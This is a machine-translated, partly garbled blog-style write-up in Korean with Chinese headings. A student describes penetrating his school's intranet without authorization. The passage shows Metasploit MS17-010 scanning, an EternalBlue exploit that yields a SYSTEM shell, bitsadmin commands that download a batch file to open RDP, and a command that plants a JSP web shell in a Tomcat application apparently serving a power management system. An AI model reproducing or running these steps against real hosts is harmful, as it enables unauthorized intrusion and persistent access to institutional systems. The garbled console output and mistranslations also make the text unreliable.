제목 : 학교의 인트라넷 서버 침투

"Blacking"그의 학교는 학생들의 대부분의 흑인 부유 한 학생들의 일반적인 집착 일 수 있습니다.

前言:​

변덕스럽게, 나는 학교가 기계를 격추하기 위해 Eternal Blue를 사용하여 갑자기 인트라넷 침투가 침투했는지 확인하고 싶었습니다. Eternal Blue 사용 도구가 드러났을 때 마지막 테스트에 대해 생각했습니다. 당시 MSF는 아직 통합되지 않았으므로 MSF를 직접 사용하는 것이 훨씬 편리합니다.

信息收集:​

알려진 10.10.10.0/24 학교의 다양한 서버에 사용되는 IP
MSF에서 Batch MS17_010을 사용하여 모듈을 확인하십시오.
123456msf5 보조/스캐너/smb/smb_ms17_010 msf5 보조 보조 (스캐너/smb/smb_ms17_010) set rhosts 10.10.0-10.10.10.254rhosts=10.10.10.0-10.10.10.254msf5 보조 (Scanner/smb/smb _ms17_010) 20threads=20msf5 보조 (스캐너/SMB/SMB_MS17_010) Exploit 스캔 결과는 다음과 같습니다.
2

漏洞利用:​

获取cmdshell​

10.10.10.104 (2008 x64)의 IP를 가진 호스트를 성공적으로 활용할 수 있습니다.
该主机关键信息:8080포트가 Tomcat의 서비스를 실행하고 있으며 포트3389이 열리지 않고 MySQL 서비스가 실행 중이며 다른 포트는 당시에 고려되지 않습니다.
123456789101112131415161717181920212222242526MSF5 Exploit/Windows/SMB/MS17_010_ETERNALBLUE MSF5 EXCIT (wind (Exploit/Windows/SMB/SMB/MS17_010_ETERNALBLUE) : 이름 현재 설정 필수 설명 -------------------------------------------------------------------------------------------------------------------- CIDR 식별자 445 예 대상 포트 (TCP) SMBDOMAIN. 아니오 (선택 사항) 인증 smbpass no (선택 사항) 지정된 사용자 이름 smbuser no (선택 사항)에 대한 비밀번호 (선택 사항) verify_arch true로 인증 할 사용자 이름은 원격 아키텍처가 익숙한 대상과 일치하는지 확인합니다. exploit target: ID 이름 ---- 0 Windows 7 및 Server 2008 R2 (x64) Exploit (Windows/SMB/MS17_010_ETERNALBLUE) SET RHOSTS 10.10.10.104RHOSTS=10.10.10.104MSF5 Exploit (Windows/SMB/MS17_010_ETERNALBLUE) 다음 수치는 CMDShell을 성공적으로 반환했으며 시스템 허가를 직접 반환했습니다. 그러나 TaskList /SVC가 현재 프로세스를보고 360 개의 능동 방어를 가졌다는 것이 더 혼란 스럽습니다. 원칙에 따라 차단되어야합니다. 어쩌면 나는 운이 좋다 2333 :
3

cmdshell升级meterpreter(失败)​

CMDSHELL이 MeterPreter (MeterPretre는 비교적 강력한 기능을 가지고 있음)만큼 사용하기 쉽지 않기 때문에 MeterPreter로 업그레이드하십시오.
첫 번째 방법 :
123456789101112131415msf5 Exploit (Windows/SMB/MS17_010_ETERNALBLUE) 사용 Post/Multi/Manage/Shell_To_MeterPreter MSF5 Post (Multi/Manage/Shell_To_MeterPreter) 옵션 모드 옵션 표시 (POST/MANAGE/SOMPEN_TO_METER) : NOTED SPERTION EXTERSTIONS-A- --------------- -------- ----------- HANDLER true yes Start an exploit/multi/handler to receive the connection LHOST no IP of host that will receive the connection from the payload (Will try to auto detect). LPORT 4433 예 페이로드에 연결할 포트. 세션 예이 모듈을 실행하는 세션 on.msf5 post (multi/manage/shell_to_meterpreter) 세션 1session=1msf5 post (multi/manage/shell_to_meterpreter) 두 번째 메소드를 실행합니다.
1SESSIONS -U 1과 나는 그것이 실패한 이유를 모른다 (아이디어 변경) :
4

远程文件下载:​

Windows와 함께 제공되는 원격 파일 다운로드 기능은 매우 강력하므로 필요한 모든 것을 다운로드 할 수 있습니다.
3306

开启远程连接​

이 기계는 Apache Service를 열고 3389.bat를/var/www/html에 넣고 CMDShell에서 실행하고 다운로드가 성공한 후 3389.bat을 실행하십시오.
1BITSADMIN /TRANSST N http://ip /OPEN3389.BAT C: \ Windows \ 3389.BAT 실행 후 (삭제 해야하는 경우), 포트 3389가 열린 것으로 나타났습니다.
5

Kali의 원격 데스크탑에 연결하는 작은 문제가있었습니다. 바이두 후, 나는 그것을 명확하게 설명하지 않았다 (나는 당분간 포기했다).
6

그러나 WIN 시스템으로 전환했을 때 문제가없는 것 같았습니다. 편리하게 수행하는 방법에 대해 생각했기 때문에 (물리적 기계가 Kali를 실행하고, 다시 WIN으로 전환하면) 비밀번호를 잡지 못했기 때문입니다.
7

尝试GetShell​

먼저 웹이 위치한 디렉토리를 찾으십시오 (공간이있는 디렉토리에 대한 따옴표를 두 배로 봐야합니다) :
1234dir C: \ dir 'C: \ Program Files \'. Dir 'C: \ Program Files \ Apache Software Foundation \ Tomcat 7.0 \ WebApps \ Eleserver \'배경은 전원 관리 시스템이어야합니다.
8

마지막으로, 나는 쉘을 시스템의 UI 프레임 워크 디렉토리에 넣기로 결정했습니다.
9

또한 원격 파일을 사용 하여이 디렉토리에 JSP Malaysia를 다운로드하십시오.
1bitsadmin /송신 n http://ip /xieying.jsp 'C: \ Program Files \ Apache Software Foundation \ Tomcat 7.0 \ webapps \ eleserver \ bjui \ plugins.jsp'브라우저에서 말레이시아를 방문하여 로그인합니다.
10

结束​

단지 원격 로그인이라고 생각합니다. 시스템 파일을 거쳐 전력 시스템 및 백업 데이터베이스의 전쟁 패키지를 중단 할 필요가 없습니다. 로컬로 빌드하면 시스템 계정 비밀번호를 얻을 수 있어야합니다.
껍질을 삭제 한 후에도 나는 여전히 순종하고 좋은 학생입니다.
 
뒤로
상단